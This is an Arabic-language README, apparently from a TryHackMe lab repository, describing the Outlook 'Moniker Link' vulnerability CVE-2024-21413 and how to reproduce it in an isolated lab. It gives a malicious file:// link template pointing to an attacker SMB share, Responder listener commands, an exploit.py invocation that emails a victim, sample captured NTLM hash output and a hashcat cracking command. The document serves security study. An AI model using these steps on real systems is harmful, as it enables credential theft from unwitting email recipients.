
دراسة حالة لـ CVE-2024-21413. تم استخدام غرفة TryHackMe Moniker Link (CVE-2024-21413) كمرجع. تم إجراء تعديلات على الاستغلال (exploit) باستخدام claude code.
⚠️ إخلاء مسؤولية: هذا المستودع مخصص حصريًا للأغراض التعليمية والبحث الأمني. تم تنفيذ جميع العروض التوضيحية في بيئات خاضعة للتحكم ومعزولة. استخدام هذه التقنيات ضد أنظمة دون إذن صريح هو غير قانوني وغير أخلاقي.
| الحقل | التفاصيل |
|---|---|
| CVE | CVE-2024-21413 |
| الإفصاح | 13 فبراير 2024 (ثلاثاء التصحيحات) |
| درجة CVSS | 9.8 (حرجة) |
| المنتج | Microsoft Outlook |
| النوع | RCE + تسريب بيانات الاعتماد (NTLM Hash) |
| الناقل | الشبكة / البريد الإلكتروني (بدون مصادقة مسبقة) |
| التفاعل | يتطلب تفاعل المستخدم (النقر على الرابط) |
| الاسم المستعار | Moniker Link |
CVE-2024-21413 هي ثغرة أمنية حرجة في Microsoft Outlook تسمح للمهاجم بـ:
يأتي اسم "Moniker Link" من استغلال كائنات COM (Component Object Model) Monikers — وهي آلية في Windows للإشارة إلى كائنات عبر سلسلة نصية — لتجاوز حمايات Outlook ضد روابط file://.
عادةً، يحظر Outlook روابط file:// التي تشير إلى موارد الشبكة، ويعرض تحذيرًا أمنيًا (Protected View). تكمن الثغرة في الطريقة التي يعالج بها Outlook عناوين URL التي تحتوي على الحرف ! — وهو فاصل Moniker.
رابط خبيث بالصيغة:
file:///\\ATTACKER_IP\share\!something
يؤدي الحرف ! إلى جعل محلل Outlook يفسّر عنوان URL كمرجع إلى COM Moniker، متجاهلاً فحوصات الأمان المعتادة. النتيجة:
Atacante envia e-mail → Vítima clica no link → Outlook processa URL com "!"
→ Bypass da Protected View → Conexão SMB automática → Hash NTLM capturado
لإعادة إنتاج هذه الحالة الدراسية بأمان:
| الجهاز | نظام التشغيل | الدور |
|---|---|---|
| المهاجم | Kali Linux | مستمع SMB + استغلال |
| الهدف | Windows 10/11 مع Outlook ضعيف | الضحية |
مهم: استخدم شبكة معزولة (NAT أو Host-Only في VirtualBox/VMware). لا تنفّذ أبدًا على شبكات حقيقية.
# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder
# Python 3 — para rodar o exploit
python3 --version
# Verificar conectividade entre as máquinas
ping <IP_ALVO>
ip a | grep inet
# Anote o IP da interface que se comunica com o alvo (ex: 192.168.56.10)
يقوم Responder بإنشاء خادم SMB وهمي يلتقط هاشات مصادقة NTLM.
sudo responder -I eth0 -v
# Substitua eth0 pela sua interface de rede
الإخراج المتوقع:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash : usuario::DESKTOP-ALVO:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_SERVIDOR_EMAIL> \
--attacker-ip 192.168.56.10
عندما تفتح الضحية البريد الإلكتروني وتنقر على الرابط، يلتقط Responder تلقائيًا هاش NTLM. يمكن استخدام هذا الهاش من أجل:
hashcat -m 5600 hash.txt wordlist.txt
انظر الملف exploit.py للحصول على السكربت الكامل والمُعلق.
انظر الملف diagrama-ataque.html للحصول على تصور تفاعلي للتدفق الكامل للهجوم.
انظر الملف MITIGACAO.md للحصول على الدليل الكامل للتخفيف والدفاع.
انظر الملف CVE-BREAKDOWN.md للحصول على التحليل الفني التفصيلي للثغرة.
دراسة حالة تم تطويرها كجزء من تدريب عملي في الأمن الهجومي عبر TryHackMe.
يتبع هذا المشروع مبادئ الإفصاح المسؤول والاختراق الأخلاقي. يهدف كل المحتوى الموجود هنا إلى التعليم وتحسين الوضع الأمني.